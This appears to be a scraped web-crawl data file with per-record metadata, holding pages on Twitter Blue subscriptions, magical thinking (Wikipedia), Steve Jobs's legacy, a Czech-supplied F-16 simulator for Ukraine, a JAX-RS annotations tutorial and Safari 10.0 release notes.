March, 116,000 — or about 4.5 percent — signed up for a subscription. 
Perhaps as an attempt to mask the low adoption numbers, Twitter also rolled out updated language on Monday to note that those with verification badges may have subscribed to Twitter Blue or were legacy accounts; previously, users were able to identify who was a Twitter Blue subscriber vs. a legacy user. For his part, Musk has not addressed the elephant in the room: that it appears few legacy users are saying they’ll pay for Twitter Blue. Instead, the mercurial CEO has spent the day laughing at his own jokes, sharing recycled meme after recycled meme.
true
true
true
As the once-coveted verification badge loses its meaning, a Twitter Blue subscription becomes a point of derision.
2024-10-12 00:00:00
2023-04-05 00:00:00
https://www.hollywoodrep…296&h=730&crop=1
article
hollywoodreporter.com
The Hollywood Reporter
null
null
6,076,043
http://en.wikipedia.org/wiki/Magical_thinking
Magical thinking - Wikipedia
null
# Magical thinking **Magical thinking**, or **superstitious thinking**,[1] is the belief that unrelated events are causally connected despite the absence of any plausible causal link between them, particularly as a result of supernatural effects.[1][2][3] Examples include the idea that personal thoughts can influence the external world without acting on them, or that objects must be causally connected if they resemble each other or have come into contact with each other in the past.[1][2][4] Magical thinking is a type of fallacious thinking and is a common source of invalid causal inferences.[3][5] Unlike the confusion of correlation with causation, magical thinking does not require the events to be correlated.[3] The precise definition of magical thinking may vary subtly when used by different theorists or among different fields of study. In anthropology, the posited causality is between religious ritual, prayer, sacrifice, or the observance of a taboo, and an expected benefit or recompense. 
In psychology, magical thinking is the belief that one's thoughts by themselves can bring about effects in the world or that thinking something corresponds with doing it.[6] These beliefs can cause a person to experience an irrational fear of performing certain acts or having certain thoughts because of an assumed correlation between doing so and threatening calamities.[1] In psychiatry, magical thinking defines false beliefs about the capability of thoughts, actions or words to cause or prevent undesirable events.[7] It is a commonly observed symptom in thought disorder, schizotypal personality disorder and obsessive-compulsive disorder.[8][9][10] ## Types ### Direct effect Bronisław Malinowski's *Magic, Science and Religion* (1954) discusses another type of magical thinking, in which words and sounds are thought to have the ability to directly affect the world.[11] This type of wish fulfillment thinking can result in the avoidance of talking about certain subjects ("Speak of the devil and he'll appear"), the use of euphemisms instead of certain words, or the belief that to know the "true name" of something gives one power over it; or that certain chants, prayers, or mystical phrases will bring about physical changes in the world. More generally, it is magical thinking to take a symbol to be its referent or an analogy to represent an identity. Sigmund Freud believed that magical thinking was produced by cognitive developmental factors. He described practitioners of magic as projecting their mental states onto the world around them, similar to a common phase in child development.[12] From toddlerhood to early school age, children will often link the outside world with their internal consciousness, e.g. "It is raining because I am sad." ### Symbolic approaches Another theory of magical thinking is the symbolic approach. Leading thinkers of this category, including Stanley J. 
Tambiah, believe that magic is meant to be expressive, rather than instrumental. As opposed to the direct, mimetic thinking of Frazer, Tambiah asserts that magic utilizes abstract analogies to express a desired state, along the lines of metonymy or metaphor.[13] An important question raised by this interpretation is how mere symbols could exert material effects. One possible answer lies in John L. Austin's concept of performativity, in which the act of saying something makes it true, such as in an inaugural or marital rite.[14] Other theories propose that magic is effective because symbols are able to affect internal psycho-physical states. They claim that the act of expressing a certain anxiety or desire can be reparative in itself.[15] ## Causes According to theories of anxiety relief and control, people turn to magical beliefs when there exists a sense of uncertainty and potential danger, and with little access to logical or scientific responses to such danger. Magic is used to restore a sense of control over circumstance. In support of this theory, research indicates that superstitious behavior is invoked more often in high stress situations, especially by people with a greater desire for control.[16][17] Another potential reason for the persistence of magic rituals is that the rituals prompt their own use by creating a feeling of insecurity and then proposing themselves as precautions.[18] Boyer and Liénard propose that in obsessive-compulsive rituals — a possible clinical model for certain forms of magical thinking — focus shifts to the lowest level of gestures, resulting in goal demotion. For example, an obsessive-compulsive cleaning ritual may overemphasize the order, direction, and number of wipes used to clean the surface. 
The goal becomes less important than the actions used to achieve the goal, with the implication that magic rituals can persist without efficacy because the intent is lost within the act.[18] Alternatively, some cases of harmless "rituals" may have positive effects in bolstering intent, as may be the case with certain pre-game exercises in sports.[19] Some scholars believe that magic is effective psychologically. They cite the placebo effect and psychosomatic disease as prime examples of how our mental functions exert power over our bodies.[20] Similarly, Robin Horton suggests that engaging in magical practices surrounding healing can relieve anxiety, which could have a significant positive physical effect. In the absence of advanced health care, such effects would play a relatively major role, thereby helping to explain the persistence and popularity of such practices.[21][22] ### Phenomenological approach Ariel Glucklich tries to understand magic from a subjective perspective, attempting to comprehend magic on a phenomenological, experientially based level. Glucklich seeks to describe the attitude that magical practitioners feel what he calls "magical consciousness" or the "magical experience". He explains that it is based upon "the awareness of the interrelatedness of all things in the world by means of simple but refined sense perception."[23] Another phenomenological model is that of Gilbert Lewis, who argues that "habit is unthinking". He believes that those practicing magic do not think of an explanatory theory behind their actions any more than the average person tries to grasp the pharmaceutical workings of aspirin.[24] When the average person takes an aspirin, he does not know how the medicine chemically functions. He takes the pill with the premise that there is proof of efficacy. Similarly, many who avail themselves of magic do so without feeling the need to understand a causal theory behind it. 
## Social ### Anthropology In religion, folk religion, and superstitious beliefs, the posited causality is between religious ritual, prayer, meditation, trances, sacrifice, incantation, curses, benediction, faith healing, or the observance of a taboo, and an expected benefit or recompense. The use of a lucky charm or ritual, for example, is assumed to increase the probability that one will perform at a level so that one can achieve a desired goal or outcome.[25] Researchers have identified two possible principles as the formal causes of the attribution of false causal relationships: - the temporal contiguity of two events - "associative thinking", the association of entities based upon their resemblance to one another Prominent Victorian theorists identified associative thinking (a common feature of practitioners of magic) as a characteristic form of irrationality. As with all forms of magical thinking, association-based and similarities-based notions of causality are not always said to be the practice of magic by a magician. For example, the doctrine of signatures held that similarities between plant parts and body parts indicated their efficacy in treating diseases of those body parts, and was a part of Western medicine during the Middle Ages. This association-based thinking is a vivid example of the general human application of the representativeness heuristic.[26] Edward Burnett Tylor coined the term "associative thinking",[27] characterizing it as pre-logical, in which the "magician's folly" is in mistaking an imagined connection with a real one. The magician believes that thematically linked items can influence one another by virtue of their similarity.[28] For example, in E. E. 
Evans-Pritchard's account, members of the Azande tribe[29] believe that rubbing crocodile teeth on banana plants can invoke a fruitful crop. Because crocodile teeth are curved (like bananas) and grow back if they fall out, the Azande observe this similarity and want to impart this capacity of regeneration to their bananas. To them, the rubbing constitutes a means of transference. Sir James Frazer (1854–1941) elaborated upon Tylor's principle by dividing magic into the categories of sympathetic and contagious magic. The latter is based upon the law of contagion or contact, in which two things that were once connected retain this link and have the ability to affect their supposedly related objects, such as harming a person by harming a lock of his hair. Sympathetic magic and homeopathy operate upon the premise that "like affects like", or that one can impart characteristics of one object to a similar object. Frazer believed that some individuals think the entire world functions according to these mimetic, or homeopathic, principles.[30] In *How Natives Think* (1925), Lucien Lévy-Bruhl describes a similar notion of mystical, "collective representations". He too sees magical thinking as fundamentally different from a Western style of thought. He asserts that in these representations, "primitive" people's "mental activity is too little differentiated for it to be possible to consider ideas or images of objects by themselves apart from the emotions and passions which evoke those ideas or are evoked by them".[31] Lévy-Bruhl explains that the indigenous people commit the *post hoc, ergo propter hoc* fallacy, in which people observe that x is followed by y, and conclude that x has caused y.[32] He believes that this fallacy is institutionalized in native culture and is committed regularly and repeatedly. 
Despite the view that magic is less than rational and entails an inferior concept of causality, in *The Savage Mind* (1966), Claude Lévi-Strauss suggested that magical procedures are relatively effective in exerting control over the environment. This outlook has generated alternative theories of magical thinking, such as the symbolic and psychological approaches, and softened the contrast between "educated" and "primitive" thinking: "Magical thinking is no less characteristic of our own mundane intellectual activity than it is of Zande curing practices."[33][n 1] ### Cultural differences Robin Horton maintains that the difference between the thinking of Western and of non-Western peoples is predominantly "idiomatic". He says that the members of both cultures use the same practical common-sense, and that both science and magic are ways beyond basic logic by which people formulate theories to explain whatever occurs. However, non-Western cultures use the idiom of magic and have community spiritual figures, and therefore non-Westerners turn to magical practices or to a specialist in that idiom. Horton sees the same logic and common-sense in all cultures, but notes that their contrasting ontological idioms lead to cultural practices which seem illogical to observers whose own culture has correspondingly contrasting norms. He explains, "[T]he layman's grounds for accepting the models propounded by the scientist are often no different from the young African villager's ground for accepting the models propounded by one of his elders."[34] Along similar lines, Michael F. Brown argues that the Aguaruna of Peru see magic as a type of technology, no more supernatural than their physical tools. Brown says that the Aguaruna utilize magic in an empirical manner; for example, they discard any magical stones which they have found to be ineffective. 
To Brown—as to Horton—magical and scientific thinking differ merely in idiom.[35] These theories blur the boundaries between magic, science, and religion, and focus on the similarities in magical, technical, and spiritual practices. Brown even ironically writes that he is tempted to disclaim the existence of 'magic.'[36] One theory of substantive difference is that of the open versus closed society. Horton describes this as one of the key dissimilarities between traditional thought and Western science. He suggests that the scientific worldview is distinguished from a magical one by the scientific method and by skepticism, requiring the falsifiability of any scientific hypothesis. He notes that for native peoples "there is no developed awareness of alternatives to the established body of theoretical texts."[37] He notes that all further differences between traditional and Western thought can be understood as a result of this factor. He says that because there are no alternatives in societies based on magical thought, a theory does not need to be objectively judged to be valid. ## In children According to Jean Piaget's Theory of Cognitive Development,[38] magical thinking is most prominent in children between ages 2 and 7. Due to examinations of grieving children, it is said that during this age, children strongly believe that their personal thoughts have a direct effect on the rest of the world. It is posited that their minds will create a reason to feel responsible if they experience something tragic that they do not understand, e.g. a death. Jean Piaget, a developmental psychologist, came up with a theory of four developmental stages. Children between ages 2 and 7 would be classified under his preoperational stage of development. During this stage children are still developing their use of logical thinking. 
A child's thinking is dominated by perceptions of physical features, meaning that if the child is told that a family pet has "gone away to a farm" when it has in fact died, then the child will have difficulty comprehending the transformation of the dog not being around anymore. Magical thinking would be evident here, since the child may believe that the family pet being gone is just temporary. Their young minds in this stage do not understand the finality of death and magical thinking may bridge the gap. ### Grief It was discovered that children often feel that they are responsible for an event or events occurring or are capable of reversing an event simply by thinking about it and wishing for a change: namely, "magical thinking".[39] Make-believe and fantasy are an integral part of life at this age and are often used to explain the inexplicable.[40][41] According to Piaget, children within this age group are often "egocentric", believing that what they feel and experience is the same as everyone else's feelings and experiences.[42] Also at this age, there is often a lack of ability to understand that there may be other explanations for events outside of the realm of things they have already comprehended. What happens outside their understanding needs to be explained using what they already know, because of an inability to fully comprehend abstract concepts.[42] Magical thinking is found particularly in children's explanations of experiences about death, whether the death of a family member or pet, or their own illness or impending death. These experiences are often new for a young child, who at that point has no experience to give understanding of the ramifications of the event.[43] A child may feel that they are responsible for what has happened, simply because they were upset with the person who died, or perhaps played with the pet too roughly. 
There may also be the idea that if the child wishes it hard enough, or performs just the right act, the person or pet may choose to come back, and not be dead any longer.[44] When considering their own illness or impending death, some children may feel that they are being punished for doing something wrong, or not doing something they should have, and therefore have become ill.[45] If a child's ideas about an event are incorrect because of their magical thinking, there is a possibility that the conclusions the child makes could result in long-term beliefs and behaviours that create difficulty for the child as they mature.[46] ## Related terms "**Quasi-magical thinking**" describes "cases in which people act as if they erroneously believe that their action influences the outcome, even though they do not really hold that belief".[47] People may realize that a superstitious intuition is logically false, but act as if it were true because they do not exert an effort to correct the intuition.[48] ## See also - Cognitive bias - Faith - Illusion of control - Law of attraction (New Thought) - Mythopoeic thought - Psychology of religion - Psychological theories of magic - Schizotypal personality disorder - Synchronicity - Tinkerbell effect - *The Year of Magical Thinking*, an account of how mourning the death of a spouse led to magical thinking ## Notes **^**The Azande practice of curing epilepsy by eating the burnt skull of a red bush monkey, based on the apparent similarity of epileptic movements and those of the monkeys, was discussed in Evans-Pritchard 1937, p. 487. ## References - ^ **a** **b** **c** **d** Bennett, Bo. "Magical Thinking". *Logically Fallacious*. Retrieved 20 May 2020. - ^ **a** **b** Carroll RT (12 Sep 2014). "Magical thinking". *The Skeptic's Dictionary*. Retrieved 20 May 2020. - ^ **a** **b** **c** Robert J. Sternberg; Henry L. Roediger III; Diane F. Halpern (2007). *Critical Thinking in Psychology*. Cambridge University Press. 
ISBN 978-0-521-60834-3. **^**Vamos, Marina (2010). "Organ transplantation and magical thinking".*Australian & New Zealand Journal of Psychiatry*.**44**(10): 883–887. doi:10.3109/00048674.2010.498786. ISSN 0004-8674. PMID 20932201. S2CID 25440192.**^**Carhart-Harris, R. (2013). "Psychedelic drugs, magical thinking and psychosis".*Journal of Neurology, Neurosurgery & Psychiatry*.**84**(9): e1. doi:10.1136/jnnp-2013-306103.17. ISSN 0022-3050.**^**Colman, Andrew M. (2012).*A Dictionary of Psychology*(3rd ed.). Oxford University Press.**^**American Psychiatric Association (2013).*Diagnostic and Statistical Manual of Mental Disorders, Fifth Edition (DSM-5)*. Arlington, VA: American Psychiatric Publishing. pp. 655, 824. doi:10.1176/appi.books.9780890425596. ISBN 978-0-89042-554-1.**^**Sadock, B. J.; Sadock, V. A.; Ruiz, P. (2017).*Kaplan and Sadock's Comprehensive Textbook of Psychiatry*(10th ed.). Wolters Kluwer. ISBN 978-1-4511-0047-1.**^**Fonseca-Pedrero E, Ortuno J, Debbané M, Chan E, Cicero D, Zhang L, Brenner C, Barkus E, Linscott E, Kwapil T, Barrantes-Vidal N, Cohen A, Raine A, Compton M, Tone E, Suhr J, Inchausti F, Bobes J, Fumero A, Giakoumaki S, Tsaousis I, Preti A, Chmielewski M, Laloyaux J, Mechri A, Lahmar M, Wuthrich V, Laroi F, Badcock J, Jablensky A, Isvoranu A, Epskamp S, Fried E (2018). "The network structure of schizotypal personality traits".*Schizophrenia Bulletin*.**44**(2): 468–479. doi:10.1093/schbul/sby044. PMC 6188518. PMID 29684178.**^**Barkataki B (2019).*Explaining obsessive-compulsive symptoms? A transcultural exploration of magical thinking and OCD in India and Australia*(PhD). Curtin university.**^**Glucklich 1997, pp. 59–61, 205–12**^**Glucklich 1997, pp. 53–5**^**Brown, Michael F. (1993).*Thinking About Magic*. Greenwood Press. pp. 5–7.**^**Glucklich 1997, pp. 60–2**^**Glucklich 1997, pp. 49–53**^**Keinan, Giora (2002). 
"The effects of stress and desire for control on superstitious behavior".*Personality and Social Psychology Bulletin*.**28**(1): 102–108. doi:10.1177/0146167202281009. S2CID 145223253.**^**Keinan, Giora (1994). "The effects of stress and tolerance of ambiguity on magical thinking".*Journal of Personality and Social Psychology*.**67**(1): 48–55. doi:10.1037/0022-3514.67.1.48.- ^ **a** **b** Boyer, Pascal; Liénard, Pierre (2008). "Ritual behavior in obsessive and normal individuals". *Current Directions in Psychological Science*.**17**(4): 291–94. CiteSeerX 10.1.1.503.1537. doi:10.1111/j.1467-8721.2008.00592.x. S2CID 145218875. **^**"Why Rituals Work".*Scientific American*. Retrieved 2015-12-17.**^**Glucklich 1997, pp. 50–68**^**Horton, Robin (1967). "African traditional thought and western science: Part I. From tradition to science".*Africa: Journal of the International African Institute*.**37**(1): 50–71. doi:10.2307/1157195. JSTOR 1157195. S2CID 145507695.**^**Horton, Robin (1967). "African traditional thought and western science: Part II. The 'closed' and 'open' predicaments".*Africa: Journal of the International African Institute*.**37**(2): 155–87. doi:10.2307/1158253. JSTOR 1158253. S2CID 245911255.**^**Glucklich 1997, p. 12**^**Lewis, Gilbert.*The Look of Magic*. University of Cambridge.**^**Hamerman, Eric J.; Morewedge, Carey K. (2015-03-01). "Reliance on luck identifying which achievement goals elicit superstitious behavior".*Personality and Social Psychology Bulletin*.**41**(3): 323–335. doi:10.1177/0146167214565055. PMID 25617118. S2CID 1160061.**^**Nisbett, D.; Ross, L. (1980).*Human Inference: Strategies and Shortcomings of Social Judgment*. Englewood Cliffs, NJ: Prentice Hall. pp. 115–8.**^**Glucklich, Ariel (1997).*The End of Magic*. Oxford University Press. pp. 32–3.**^**Evans-Pritchard, E. E. (1977).*Theories of Primitive Religion*. Oxford University Press. pp. 26–7.**^**Evans-Pritchard, E. E. (1937).*Witchcraft, Magic, and Oracles Among the Azande*. 
Oxford: Clarendon Press.**^**Frazer, James (1915) [1911].*The Golden Bough: A Study in Magic and Religion*(3rd ed.). London: Macmillan.**^**Lévy-Bruhl, Lucien (1925).*How Natives Think*. Knopf. p. 36.**^**Lévy-Bruhl 1925, p. 76**^**Shweder, Richard A. (1977). "Likeness and likelihood in everyday thought: Magical thinking in judgments about personality".*Current Anthropology*.**18**(4): 637–58 (637). doi:10.1086/201974. JSTOR 2741505. S2CID 29780746.**^**Horton 1967b, p. 171**^**Brown, Michael F. (1986).*Tsewa's Gift: Magic and Meaning in an Amazonian Society*. University of Alabama Press.**^**Brown 1993, p. 2**^**Horton 1967b, p. 155**^**Piaget, Jean (1929).*The child's conception of the world*. London: Routledge & Kegan Paul.**^**Nielson, D. (2012). "Discussing death with pediatric patients: Implications for nurses".*Journal of Pediatric Nursing*.**27**(5): e59–e64. doi:10.1016/j.pedn.2011.11.006. PMID 22198004.**^**Samide, L.; Stockton, R. (2002). "Letting go of grief: Bereavement groups for children in the school setting".*Journal for Specialists in Group Work*.**27**(2): 192–204. doi:10.1177/0193392202027002006.**^**Webb, N. (2010). "The child and death". In Webb, N.B. (ed.).*Helping Bereaved Children: A Handbook for Practitioners*. New York: Guildford. pp. 5–6.- ^ **a** **b** Biank, N.; Werner-Lin, A. (2011). "Growing up with grief: Revisiting the death of a parent over the life course". *Omega*.**63**(3): 271–290. doi:10.2190/om.63.3.e. PMID 21928600. S2CID 37763796. **^**Webb 2010, p. 51**^**Schoen, A.; Burgoyen, M.; Schoen, S. (2004). "Are the developmental needs of children in America adequately addressed during the grief process?".*Journal of Instructional Psychology*.**31**: 143–8. EBSCOhost 13719052.**^**Schonfeld, D. (1993). "Talking with children about death".*Journal of Pediatric Health Care*.**7**(6): 269–74. doi:10.1016/s0891-5245(06)80008-8. PMID 8106926.**^**Sossin, K.; Cohen, P. (2011). 
"Children's play in the wake of loss and trauma".*Journal of Infant, Child and Adolescent Psychotherapy*.**10**(2–3): 255–72. doi:10.1080/15289168.2011.600137. S2CID 146429165.**^**Shafir, E.; Tversky, A. (1992). "Thinking through uncertainty: Nonconsequential reasoning and choice".*Cognitive Psychology*.**24**(4): 449–74. doi:10.1016/0010-0285(92)90015-T. PMID 1473331. S2CID 29570235.**^**Risen, Jane L. (2016). "Believing what we do not believe: Acquiescence to superstitious beliefs and other powerful intuitions".*Psychological Review*.**123**(2): 182–207. doi:10.1037/rev0000017. PMID 26479707. S2CID 14384232. ## Further reading [edit]- Hood, Bruce (2009). *SuperSense: Why We Believe in the Unbelievable*. HarperOne. ISBN 9780061452642. - Horton, Robin (1970). "African traditional thought and western science". In Wilson, Bryan R. (ed.). *Rationality*. Key Concepts in the Social Sciences. Oxford: Basil Blackwell. pp. 131–171. ISBN 9780631119302. Abridged version of Horton (1967a) and Horton (1967b). - Hutson, Matthew (2012). *The 7 Laws of Magical Thinking: How Irrational Beliefs Keep Us Happy, Healthy, and Sane*. Hudson Street Press. ISBN 9781594630873. - Serban, George (1982). *The Tyranny of Magical Thinking*. New York: E. P. Dutton. ISBN 9780525241409. This work discusses how and why the magical thinking of childhood can carry into adulthood, causing various maladaptions and psychopathologies. - Vyse, Stuart (1997). *Believing in Magic: The Psychology of Superstition*. Oxford University Press. ISBN 9780195136340. ## External links [edit]- Hutson, Matthew (2008). "Magical thinking". *Psychology Today*. Vol. March–April. pp. 89–95. - Stevens, Phillips Jr. (November–December 2001). "Magical thinking in complementary and alternative medicine". *Skeptical Inquirer*.**25**(6). Archived from the original on 2010-06-03. Retrieved 2010-09-22.
true
true
true
null
2024-10-12 00:00:00
2003-02-19 00:00:00
null
website
wikipedia.org
Wikimedia Foundation, Inc.
null
null
1,574,600
http://www.technologyreview.com/computing/25924/?a=f
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
3,179,553
http://harry-lewis.blogspot.com/2011/10/bit-of-nuance-on-steve-jobs.html
A bit of nuance on Steve Jobs
Harry Lewis
I actually thought that within a day of his death, but restrained myself out of respect. *De mortuis nil nisi bonum.* The statute of limitations having now run out, I'd like to add a few words. First on the plus side. Jobs was a design genius. His resolute insistence on simplicity and cleanliness wasn't a new thing in technology, but it was a new thing in computer technology. The over-complication of Microsoft software created a huge target to shoot at, but Jobs did not stop at being better. He really did have a genius for reducing things to their intuitive essentials and not accepting anything less. So of all the tributes, I like Ross Douthat's in today's NYT the best. Nobody would have said that a computer was beautiful before Apple products. The all-white IBM Charlie Chaplin ads tried to make you think that PCs were beautiful, but they weren't. And one of Jobs's greatest successes has not gotten a lot of press: The iTunes business model. He jerked the music industry into the Internet age and found a way for everyone to make money by selling singles for $.99. That was a stunning development given the rigid conservatism of the music industry's selling-plastic business model. (But see Dan Gillmor for appropriate reservations where this success is taking us.) Having said all that, I would add three reservations. First, Jobs was not a technological innovator in any significant sense. As has been told many times (though not often in the past week), the snappy, intuitive Mac interface was invented at the Xerox Palo Alto Research Center. Jobs oversaw the process of squeezing it down to fit in a box with 128K of memory and no hard drive. Those first Macs barely ran, but they got the ball rolling. There are many other examples. I toured the Mac assembly line in early 1984 -- the manufacturing technology was Japanese and had never been used in the US the way Apple was using it. 
So part of Jobs's genius was recognizing the potential in other people's inventions, and executing the consolidation and integration of those developments. Of course, this is not really a negative. The world is full of examples of inventions that changed the world due to the genius of the executor, not the inventor. (Think Facebook.)

Second, Jobs's uncompromising insistence on simplicity sometimes got the better of him. When the Mac was designed, it was a courageous decision to insist on a one-button mouse. That was the source of some ridicule at the time (as well as some admiration). PCs already had two-button mice and there were experiments with 3-button mice. In this case the insistence on simplicity was right. But Jobs also insisted on a keyboard with no function keys. That pretty much cost Apple the business market, because Excel users needed function keys. I felt sorry for the true-believing Apple salespeople trying to sell Macintoshes into the workplace. Except for graphic design, it was a non-starter. So in this instance at least, the refusal to compromise was short-sighted. The course of computer history would have been different if Jobs had put function keys on the early Mac keyboards.

And finally, I am glad to learn that Jobs was a good family man, but he wasn't always a nice person to the people who worked for him and who challenged his absolute authority. Perhaps some of those people have already written about their experiences or will do so shortly. And even with family members, it wasn't always all love all the time--for years he refused even to acknowledge his first child. Perhaps I am being churlish to note any of these things, but as Tom Lehrer said, if you don't like my song, you should never have let me begin!

Even after reading this nuanced view of him I still think highly of him. The halo effect after someone dies is a bad thing; then there is backlash. Better to have an honest appraisal in the first place.

THANKS HARRY!
I think it is unfair to say that he was "not a technical innovator in any significant sense".

He definitely was not a researcher or an inventor, but innovation is a much broader term than that. It includes not just inventing new ideas, but also bringing other people's ideas to market in a way that brings new value and changes the market. Apple has certainly done that, and Steve played a big role in directing that innovation.
true
true
true
I think the canonization of Steve Jobs is getting a little tiresome. I actually thought that within a day of his death, but restrained mys...
2024-10-12 00:00:00
2011-10-09 00:00:00
null
null
blogspot.com
harry-lewis.blogspot.com
null
null
2,533,687
http://thenextweb.com/video/2011/05/10/apple-baby-aza-raskin-on-the-secrets-of-great-user-interface/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
5,786,263
http://www.wired.com/threatlevel/2013/05/google-pharma-whitaker-sting/?1
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
40,316,919
https://www.pravda.com.ua/eng/news/2024/05/10/7455130/
Ukraine’s Air Force receives first F-16 fighter jet trainer – video
VALENTYNA ROMANENKO
# Ukraine's Air Force receives first F-16 fighter jet trainer – video

Czechia has handed over the first F-16 fighter jet simulator to one of Ukraine's tactical aviation brigades, and its main module is being tested and prepared for operation by Ukrainian engineers.

**Source:** Commander of the Ukrainian Air Force Lieutenant General Mykola Oleshchuk on Telegram; press service for Air Force Command

**Quote:** "I thank everyone who is helping Ukraine strengthen its aircraft component. Of course, in addition to the F-16s themselves, we need to create a strong supply of training equipment for our youth. I urge our allies to join this initiative."

**Details:** The Air Force explains that this is not a simple simulator but a full-fledged flight trainer with a real F-16 cockpit. Hydraulics will be installed next, so that the pilot gets the most realistic experience during training flights.

**Background:**

- Media outlets reported that the first F-16 fighter jets would appear in Ukrainian skies around June 2024.
- The Belgian government recently approved a 25th support aid package for Ukraine, which includes funds for maintaining F-16s.

**Support UP or become our patron!**
true
true
true
Czechia has handed over the first F-16 fighter jet simulator to one of Ukraine’s tactical aviation brigades, and its main module is being tested and prepared for operation by Ukrainian engineers.
2024-10-12 00:00:00
2024-05-10 00:00:00
https://img.pravda.com/i…_10_13_34_47.jpg
article
pravda.com.ua
Ukrainska Pravda
null
null
9,162,800
http://codeforces.com/blog/entry/15547
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
16,270,295
https://readlearncode.com/java-ee/what-are-the-jax-rs-annotations-queryparameter-produces-consumes/
What are JAX-RS Annotations?
Alex
# What are JAX-RS Annotations?

## Overview of JAX-RS Annotations (Part 3)

This is a three-part series looking at the annotations that are used to implement REST endpoints. In part one of JAX-RS annotations you learned about:

- The @Path annotation (again) and @PathParam
- The @QueryParam annotation
- The @Produces annotation
- The @Consumes annotation

In this part, you will learn more about JAX-RS annotations. Are you ready? Then let's get started.

### The @FormParam Annotation

You may need to read parameters sent in a POST HTTP request directly from the body, rather than serializing them to an object. This can be done by using the *@FormParam* annotation.

```java
@POST
@Produces(MediaType.APPLICATION_JSON)
public Response saveBookF(@FormParam("title") String title,
                          @FormParam("author") String author,
                          @FormParam("price") Float price) {
    return Response.ok(bookRepository.saveBook(new Book(title, author, price))).build();
}
```

### The @MatrixParam Annotation

Matrix parameters are a set of query parameters separated by a semicolon rather than an ampersand. This may occur because the values were selected from a multiple-select input box and sent via a GET request rather than a POST request. The URL might look something like this:

http://localhost:8080/api/books;author=atheedom;category=Java;language=english

The *@MatrixParam* annotation is used to retrieve the parameter value from the URI and assign it to a method parameter.

```java
@GET
@Produces(MediaType.APPLICATION_JSON)
public Response getBookBy(@MatrixParam("author") String author,
                          @MatrixParam("category") String category,
                          @MatrixParam("language") String language) {
    return Response.ok(
        new GenericEntity<List<Book>>(
            bookRepository.getBookBy(author, category, language)) {}).build();
}
```

### The @CookieParam Annotation

The *@CookieParam* annotation allows you to inject cookies sent by the client directly into your resource method.
Imagine you have sent a cookie called *cartId* to the client so that you can track the customer's shopping cart. To pull the cookie from the HTTP request, just annotate the method parameter to which you want the cookie data to be assigned.

```java
@GET
@Produces(MediaType.APPLICATION_JSON)
public Response getCart(@CookieParam("cartId") int cartId) {
    return Response.ok().build();
}
```

### The @HeaderParam Annotation

The *@HeaderParam* annotation is used to inject HTTP request header values into resource method parameters. You can think of it as a shortcut to using the *@Context* annotation to inject the HttpServletRequest or HttpHeaders instance.

```java
@GET
@Produces(MediaType.APPLICATION_JSON)
public Response getReferrer(@HeaderParam("referer") String referrer) {
    return Response.ok(referrer).build();
}
```

### The @Provider Annotation

Providers are used to extend and customize JAX-RS by altering the behavior of the runtime to achieve a set of goals. There are three types of providers:

- **Entity providers**: control the mapping of data representations, such as JSON and XML, to their object equivalents.
- **Context providers**: control the context that resources can access with the @Context annotation.
- **Exception providers**: control the mapping of Java exceptions to a JAX-RS Response instance.

The only thing they have in common is that they must be identified by the *@Provider* annotation and follow the correct rules for constructor declaration.

### Code Repository

The source code for this article is in my GitHub repository. Code for all my articles is in the ReadLearnCode Articles repository.
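To make the semicolon-separated matrix-parameter format described above concrete, here is a small sketch (plain Python, independent of any JAX-RS runtime) that splits a path segment into its name and matrix parameters — the same extraction a JAX-RS container performs before binding values to *@MatrixParam* method parameters:

```python
def parse_matrix_params(segment):
    """Split a path segment such as 'books;author=x;category=y'
    into the segment name and a dict of matrix parameters."""
    name, _, raw = segment.partition(";")
    params = {}
    for pair in raw.split(";"):
        if pair:  # skip empty entries (e.g. trailing semicolons)
            key, _, value = pair.partition("=")
            params[key] = value
    return name, params

name, params = parse_matrix_params(
    "books;author=atheedom;category=Java;language=english")
print(name)    # books
print(params)  # {'author': 'atheedom', 'category': 'Java', 'language': 'english'}
```

In a real application you never write this yourself — the container extracts each value and injects it into the matching *@MatrixParam*-annotated parameter.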
## Further Reading

If you are interested in reading more about the **JAX-RS API**, then these articles will interest you:

- **Bean validation failure management** discusses how to respond to clients when input fails data integrity checks
- Discover all the uses of the **@javax.ws.rs.core.Context annotation**
- Working with **@Consumes and @Produces annotations**
- **JAX-RS Resource Entities** discusses how to create JAX-RS resource entities

## Learn More

If you want to level up your Java EE skills, consider my online video training course. I cover a range of topics from the Java EE platform, including:

- how to develop an online bookshop using **RESTful APIs**,
- how to develop your own chat application with the **WebSocket API**, and
- how to become a JSON ninja with the **JSON-Processing API**.

However, if you are taking your first foray into the awesome world of enterprise Java development, then you will want to take my course **Learning Java Enterprise Edition**. It is a chock-a-block two-hour course covering all the most important APIs in the Java EE ecosystem.

Thanks, nice post
true
true
true
Overview of JAX-RS Annotations (Part 3) This is a three-part series looking at the annotation that is used to implement REST endpoints. In part one of JAX-RS annotations you learn about: The @Path …
2024-10-12 00:00:00
2017-08-28 00:00:00
https://i0.wp.com/readle…=640%2C426&ssl=1
article
readlearncode.com
Digital Transformation and Java Video Training
null
null
36,536,087
https://www.adexchanger.com/online-advertising/mediamath-files-for-bankruptcy-after-acquisition-talks-fall-apart/
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
12,542,029
https://developer.apple.com/library/content/releasenotes/General/WhatsNewInSafari/Articles/Safari_10_0.html
How helpful is this document?
null
# Safari 10.0 The following new features have been added in Safari 10.0. ## Web APIs ### IndexedDB Support Safari’s IndexedDB implementation now fully supports the recommended standard. You may now use the API to store structured data for web applications that work offline or that require large amounts of client-side data caching. ### Programmatic Cut and Copy Support Use JavaScript commands to programmatically cut and copy text to the clipboard with `document.execCommand('cut')` and `document.execCommand('copy')` . ### CSP 2.0 Content Security Policy (CSP) support has been enhanced by including version 2.0 of the standard. ### Shadow DOM Version 1 of the Shadow DOM standard provides the foundation for Web Components. You can take advantage of Shadow DOM to encapsulate functionality without worrying about conflicts between scripts and styles on the page. ### ES6 The ECMAScript 2015 standard, also known as ES6, is completely supported, bringing this major JavaScript evolution to Safari on macOS and iOS. ### ES Internationalization Integration of the ECMAScript Internationalization API standard, also known as ECMA-402, supports client-side number, currency, and date-formatting that honors the user’s language and locale or uses a provided language and locale. ### DOM Compatibility Improvements Many fundamental browser- and site-compatibility improvements now ensure that Safari 10 passes even more World Wide Web Consortium (W3C) tests and is compatible with other browsers. ### 3D Touch Events For 3D Touch on iOS, the `touchforcechange` event is called only when the 